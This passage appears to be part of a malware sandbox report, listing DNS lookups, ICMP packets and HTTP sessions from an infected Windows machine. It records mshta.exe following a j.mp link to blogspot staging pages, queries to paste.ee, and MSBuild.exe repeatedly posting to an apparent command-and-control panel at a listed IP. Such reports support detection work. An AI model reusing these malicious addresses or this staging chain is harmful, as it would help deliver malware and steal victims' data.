                                                                                                                                                                                                            Jan 13, 2021 13:45:29.878982067 CET5281953192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:45:29.883483887 CET5121553192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:45:29.926867962 CET53528198.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:45:29.947478056 CET53512158.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:45:32.672183037 CET6031253192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:45:32.728512049 CET53603128.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:45:33.670972109 CET6346353192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:45:33.729955912 CET53634638.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:45:41.219335079 CET6222453192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:45:41.276051044 CET53622248.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:45:42.234687090 CET5906453192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:45:42.293833971 CET53590648.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:45:49.579821110 CET5988553192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:45:49.636311054 CET53598858.8.8.8192.168.2.22
                                                                                                                                                                                                            Jan 13, 2021 13:45:49.638029099 CET6374953192.168.2.228.8.8.8
                                                                                                                                                                                                            Jan 13, 2021 13:45:49.688711882 CET53637498.8.8.8192.168.2.22

                                                                                                                                                                                                            ICMP Packets

                                                                                                                                                                                                            TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                                                            Jan 13, 2021 13:45:29.676234961 CET192.168.2.228.8.8.8d064(Port unreachable)Destination Unreachable

                                                                                                                                                                                                            DNS Queries

                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                                            Jan 13, 2021 13:44:22.673477888 CET192.168.2.228.8.8.80xc2c0Standard query (0)j.mpA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:44:23.009288073 CET192.168.2.228.8.8.80x1deaStandard query (0)mainjigijigi123.blogspot.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.424066067 CET192.168.2.228.8.8.80xbb68Standard query (0)www.blogger.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.489990950 CET192.168.2.228.8.8.80xbb68Standard query (0)www.blogger.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:44:25.648607969 CET192.168.2.228.8.8.80x1000Standard query (0)resources.blogblog.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:44:29.015083075 CET192.168.2.228.8.8.80x9210Standard query (0)paste.eeA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:44:31.619276047 CET192.168.2.228.8.8.80x6e0bStandard query (0)randikhanaekminar.blogspot.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:44:31.687319040 CET192.168.2.228.8.8.80x6e0bStandard query (0)randikhanaekminar.blogspot.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:44:33.324801922 CET192.168.2.228.8.8.80x605aStandard query (0)www.blogger.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:44:40.186141014 CET192.168.2.228.8.8.80xb851Standard query (0)paste.eeA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:44:40.971148968 CET192.168.2.228.8.8.80xca10Standard query (0)paste.eeA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:44:46.811579943 CET192.168.2.228.8.8.80xd0e2Standard query (0)backbones1234511a.blogspot.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:44:46.878504038 CET192.168.2.228.8.8.80xd0e2Standard query (0)backbones1234511a.blogspot.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:44:46.938976049 CET192.168.2.228.8.8.80xd0e2Standard query (0)backbones1234511a.blogspot.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:44:48.897459030 CET192.168.2.228.8.8.80x8474Standard query (0)www.blogger.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:44:54.222888947 CET192.168.2.228.8.8.80x10e9Standard query (0)startthepartyup.blogspot.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:44:55.485379934 CET192.168.2.228.8.8.80xa9e8Standard query (0)paste.eeA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:44:56.310018063 CET192.168.2.228.8.8.80x863cStandard query (0)www.blogger.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:45:03.117901087 CET192.168.2.228.8.8.80xf89fStandard query (0)ghostbackbone123.blogspot.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:45:03.183072090 CET192.168.2.228.8.8.80xf89fStandard query (0)ghostbackbone123.blogspot.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:45:05.281723976 CET192.168.2.228.8.8.80x3e66Standard query (0)www.blogger.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:45:16.629877090 CET192.168.2.228.8.8.80x25bStandard query (0)paste.eeA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:45:24.097852945 CET192.168.2.228.8.8.80xffdStandard query (0)backbones1234511a.blogspot.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:45:25.104094982 CET192.168.2.228.8.8.80x8ed6Standard query (0)www.blogger.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:45:26.561464071 CET192.168.2.228.8.8.80x446fStandard query (0)paste.eeA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:45:32.672183037 CET192.168.2.228.8.8.80x565eStandard query (0)startthepartyup.blogspot.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:45:33.670972109 CET192.168.2.228.8.8.80xe20Standard query (0)www.blogger.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:45:41.219335079 CET192.168.2.228.8.8.80x7a65Standard query (0)ghostbackbone123.blogspot.comA (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:45:42.234687090 CET192.168.2.228.8.8.80x5a54Standard query (0)www.blogger.comA (IP address)IN (0x0001)

                                                                                                                                                                                                            DNS Answers

                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                                            Jan 13, 2021 13:44:22.722846985 CET8.8.8.8192.168.2.220xc2c0No error (0)j.mp67.199.248.16A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:44:22.722846985 CET8.8.8.8192.168.2.220xc2c0No error (0)j.mp67.199.248.17A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:44:23.073410034 CET8.8.8.8192.168.2.220x1deaNo error (0)mainjigijigi123.blogspot.comblogspot.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:44:23.073410034 CET8.8.8.8192.168.2.220x1deaNo error (0)blogspot.l.googleusercontent.com108.177.127.132A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.489083052 CET8.8.8.8192.168.2.220xbb68No error (0)www.blogger.comblogger.l.google.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:44:24.548269987 CET8.8.8.8192.168.2.220xbb68No error (0)www.blogger.comblogger.l.google.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:44:25.715763092 CET8.8.8.8192.168.2.220x1000No error (0)resources.blogblog.comblogger.l.google.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:44:29.071233988 CET8.8.8.8192.168.2.220x9210No error (0)paste.ee104.18.49.20A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:44:29.071233988 CET8.8.8.8192.168.2.220x9210No error (0)paste.ee104.18.48.20A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:44:29.071233988 CET8.8.8.8192.168.2.220x9210No error (0)paste.ee172.67.219.133A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:44:31.686795950 CET8.8.8.8192.168.2.220x6e0bNo error (0)randikhanaekminar.blogspot.comblogspot.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:44:31.686795950 CET8.8.8.8192.168.2.220x6e0bNo error (0)blogspot.l.googleusercontent.com108.177.127.132A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:44:31.746385098 CET8.8.8.8192.168.2.220x6e0bNo error (0)randikhanaekminar.blogspot.comblogspot.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:44:31.746385098 CET8.8.8.8192.168.2.220x6e0bNo error (0)blogspot.l.googleusercontent.com108.177.127.132A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:44:33.381355047 CET8.8.8.8192.168.2.220x605aNo error (0)www.blogger.comblogger.l.google.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:44:40.242908955 CET8.8.8.8192.168.2.220xb851No error (0)paste.ee104.18.49.20A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:44:40.242908955 CET8.8.8.8192.168.2.220xb851No error (0)paste.ee104.18.48.20A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:44:40.242908955 CET8.8.8.8192.168.2.220xb851No error (0)paste.ee172.67.219.133A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:44:41.027657986 CET8.8.8.8192.168.2.220xca10No error (0)paste.ee104.18.49.20A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:44:41.027657986 CET8.8.8.8192.168.2.220xca10No error (0)paste.ee104.18.48.20A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:44:41.027657986 CET8.8.8.8192.168.2.220xca10No error (0)paste.ee172.67.219.133A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:44:46.877253056 CET8.8.8.8192.168.2.220xd0e2No error (0)backbones1234511a.blogspot.comblogspot.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:44:46.877253056 CET8.8.8.8192.168.2.220xd0e2No error (0)blogspot.l.googleusercontent.com108.177.127.132A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:44:46.938445091 CET8.8.8.8192.168.2.220xd0e2No error (0)backbones1234511a.blogspot.comblogspot.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:44:46.938445091 CET8.8.8.8192.168.2.220xd0e2No error (0)blogspot.l.googleusercontent.com108.177.127.132A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:44:47.003381014 CET8.8.8.8192.168.2.220xd0e2No error (0)backbones1234511a.blogspot.comblogspot.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:44:47.003381014 CET8.8.8.8192.168.2.220xd0e2No error (0)blogspot.l.googleusercontent.com108.177.127.132A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:44:48.962050915 CET8.8.8.8192.168.2.220x8474No error (0)www.blogger.comblogger.l.google.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:44:54.287549019 CET8.8.8.8192.168.2.220x10e9No error (0)startthepartyup.blogspot.comblogspot.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:44:54.287549019 CET8.8.8.8192.168.2.220x10e9No error (0)blogspot.l.googleusercontent.com108.177.127.132A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:44:55.560195923 CET8.8.8.8192.168.2.220xa9e8No error (0)paste.ee172.67.219.133A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:44:55.560195923 CET8.8.8.8192.168.2.220xa9e8No error (0)paste.ee104.18.48.20A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:44:55.560195923 CET8.8.8.8192.168.2.220xa9e8No error (0)paste.ee104.18.49.20A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:44:56.366463900 CET8.8.8.8192.168.2.220x863cNo error (0)www.blogger.comblogger.l.google.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:45:03.182449102 CET8.8.8.8192.168.2.220xf89fNo error (0)ghostbackbone123.blogspot.comblogspot.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:45:03.182449102 CET8.8.8.8192.168.2.220xf89fNo error (0)blogspot.l.googleusercontent.com108.177.127.132A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:45:03.239538908 CET8.8.8.8192.168.2.220xf89fNo error (0)ghostbackbone123.blogspot.comblogspot.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:45:03.239538908 CET8.8.8.8192.168.2.220xf89fNo error (0)blogspot.l.googleusercontent.com108.177.127.132A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:45:05.338166952 CET8.8.8.8192.168.2.220x3e66No error (0)www.blogger.comblogger.l.google.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:45:16.686925888 CET8.8.8.8192.168.2.220x25bNo error (0)paste.ee104.18.49.20A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:45:16.686925888 CET8.8.8.8192.168.2.220x25bNo error (0)paste.ee104.18.48.20A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:45:16.686925888 CET8.8.8.8192.168.2.220x25bNo error (0)paste.ee172.67.219.133A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:45:24.157201052 CET8.8.8.8192.168.2.220xffdNo error (0)backbones1234511a.blogspot.comblogspot.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:45:24.157201052 CET8.8.8.8192.168.2.220xffdNo error (0)blogspot.l.googleusercontent.com108.177.127.132A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:45:25.164253950 CET8.8.8.8192.168.2.220x8ed6No error (0)www.blogger.comblogger.l.google.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:45:26.620728016 CET8.8.8.8192.168.2.220x446fNo error (0)paste.ee104.18.49.20A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:45:26.620728016 CET8.8.8.8192.168.2.220x446fNo error (0)paste.ee104.18.48.20A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:45:26.620728016 CET8.8.8.8192.168.2.220x446fNo error (0)paste.ee172.67.219.133A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:45:32.728512049 CET8.8.8.8192.168.2.220x565eNo error (0)startthepartyup.blogspot.comblogspot.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:45:32.728512049 CET8.8.8.8192.168.2.220x565eNo error (0)blogspot.l.googleusercontent.com108.177.127.132A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:45:33.729955912 CET8.8.8.8192.168.2.220xe20No error (0)www.blogger.comblogger.l.google.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:45:41.276051044 CET8.8.8.8192.168.2.220x7a65No error (0)ghostbackbone123.blogspot.comblogspot.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:45:41.276051044 CET8.8.8.8192.168.2.220x7a65No error (0)blogspot.l.googleusercontent.com108.177.127.132A (IP address)IN (0x0001)
                                                                                                                                                                                                            Jan 13, 2021 13:45:42.293833971 CET8.8.8.8192.168.2.220x5a54No error (0)www.blogger.comblogger.l.google.comCNAME (Canonical name)IN (0x0001)

                                                                                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                                                                                            • j.mp
                                                                                                                                                                                                            • 64.188.18.218

                                                                                                                                                                                                            HTTP Packets

                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                            0192.168.2.224916767.199.248.1680C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                                                            Jan 13, 2021 13:44:22.788650990 CET0OUTGET /dbgghasdnasdjasgdakgsdhv HTTP/1.1
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                                                                            UA-CPU: AMD64
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                                            Host: j.mp
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Jan 13, 2021 13:44:22.931399107 CET1INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Wed, 13 Jan 2021 12:44:22 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                            Content-Length: 137
                                                                                                                                                                                                            Cache-Control: private, max-age=90
                                                                                                                                                                                                            Location: https://mainjigijigi123.blogspot.com/p/st2222.html
                                                                                                                                                                                                            Set-Cookie: _bit=l0dcIm-10c992d95c13237e4b-003; Domain=j.mp; Expires=Mon, 12 Jul 2021 12:44:22 GMT
                                                                                                                                                                                                            Via: 1.1 google
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 42 69 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 61 69 6e 6a 69 67 69 6a 69 67 69 31 32 33 2e 62 6c 6f 67 73 70 6f 74 2e 63 6f 6d 2f 70 2f 73 74 32 32 32 32 2e 68 74 6d 6c 22 3e 6d 6f 76 65 64 20 68 65 72 65 3c 2f 61 3e 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                            Data Ascii: <html><head><title>Bitly</title></head><body><a href="https://mainjigijigi123.blogspot.com/p/st2222.html">moved here</a></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                            1192.168.2.224919764.188.18.21880C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                                                            Jan 13, 2021 13:44:58.951586962 CET3086OUTPOST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                            Host: 64.188.18.218
                                                                                                                                                                                                            Content-Length: 368
                                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Jan 13, 2021 13:44:59.074533939 CET3086INHTTP/1.1 100 Continue
                                                                                                                                                                                                            Jan 13, 2021 13:44:59.209170103 CET3087INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 13 Jan 2021 12:44:59 GMT
                                                                                                                                                                                                            Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
                                                                                                                                                                                                            X-Powered-By: PHP/7.2.34
                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                            Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Jan 13, 2021 13:44:59.486521959 CET3087OUTPOST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                            Host: 64.188.18.218
                                                                                                                                                                                                            Content-Length: 368
                                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                                            Jan 13, 2021 13:44:59.609003067 CET3087INHTTP/1.1 100 Continue
                                                                                                                                                                                                            Jan 13, 2021 13:44:59.739639044 CET3088INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 13 Jan 2021 12:44:59 GMT
                                                                                                                                                                                                            Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
                                                                                                                                                                                                            X-Powered-By: PHP/7.2.34
                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Jan 13, 2021 13:44:59.815963984 CET3088OUTPOST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                            Host: 64.188.18.218
                                                                                                                                                                                                            Content-Length: 368
                                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                                            Jan 13, 2021 13:44:59.938215971 CET3088INHTTP/1.1 100 Continue
                                                                                                                                                                                                            Jan 13, 2021 13:45:00.075582981 CET3089INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 13 Jan 2021 12:44:59 GMT
                                                                                                                                                                                                            Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
                                                                                                                                                                                                            X-Powered-By: PHP/7.2.34
                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Jan 13, 2021 13:45:00.189289093 CET3090OUTPOST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                            Host: 64.188.18.218
                                                                                                                                                                                                            Content-Length: 368
                                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                                            Jan 13, 2021 13:45:00.314462900 CET3091INHTTP/1.1 100 Continue
                                                                                                                                                                                                            Jan 13, 2021 13:45:00.453552008 CET3091INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 13 Jan 2021 12:45:00 GMT
                                                                                                                                                                                                            Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
                                                                                                                                                                                                            X-Powered-By: PHP/7.2.34
                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Jan 13, 2021 13:45:00.530474901 CET3092OUTPOST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                            Host: 64.188.18.218
                                                                                                                                                                                                            Content-Length: 368
                                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                                            Jan 13, 2021 13:45:00.653135061 CET3092INHTTP/1.1 100 Continue
                                                                                                                                                                                                            Jan 13, 2021 13:45:00.786899090 CET3093INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 13 Jan 2021 12:45:00 GMT
                                                                                                                                                                                                            Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
                                                                                                                                                                                                            X-Powered-By: PHP/7.2.34
                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Jan 13, 2021 13:45:01.049076080 CET3094OUTPOST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                            Host: 64.188.18.218
                                                                                                                                                                                                            Content-Length: 368
                                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                                            Jan 13, 2021 13:45:01.171358109 CET3095INHTTP/1.1 100 Continue
                                                                                                                                                                                                            Jan 13, 2021 13:45:01.401803017 CET3095INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 13 Jan 2021 12:45:01 GMT
                                                                                                                                                                                                            Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
                                                                                                                                                                                                            X-Powered-By: PHP/7.2.34
                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Jan 13, 2021 13:45:01.534459114 CET3096OUTPOST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                            Host: 64.188.18.218
                                                                                                                                                                                                            Content-Length: 368
                                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                                            Jan 13, 2021 13:45:01.657144070 CET3098INHTTP/1.1 100 Continue
                                                                                                                                                                                                            Jan 13, 2021 13:45:01.791830063 CET3099INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 13 Jan 2021 12:45:01 GMT
                                                                                                                                                                                                            Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
                                                                                                                                                                                                            X-Powered-By: PHP/7.2.34
                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Jan 13, 2021 13:45:02.309396029 CET3100OUTPOST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                            Host: 64.188.18.218
                                                                                                                                                                                                            Content-Length: 368
                                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                                            Jan 13, 2021 13:45:02.431840897 CET3100INHTTP/1.1 100 Continue
                                                                                                                                                                                                            Jan 13, 2021 13:45:02.561350107 CET3101INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 13 Jan 2021 12:45:02 GMT
                                                                                                                                                                                                            Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
                                                                                                                                                                                                            X-Powered-By: PHP/7.2.34
                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Jan 13, 2021 13:45:02.773190975 CET3102OUTPOST /webpanel-st/inc/6295ae82aa2db6.php HTTP/1.1
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                            Host: 64.188.18.218
                                                                                                                                                                                                            Content-Length: 368
                                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                                            Jan 13, 2021 13:45:02.896239996 CET3102INHTTP/1.1 100 Continue
                                                                                                                                                                                                            Jan 13, 2021 13:45:03.030250072 CET3102INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 13 Jan 2021 12:45:02 GMT
                                                                                                                                                                                                            Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
                                                                                                                                                                                                            X-Powered-By: PHP/7.2.34
                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
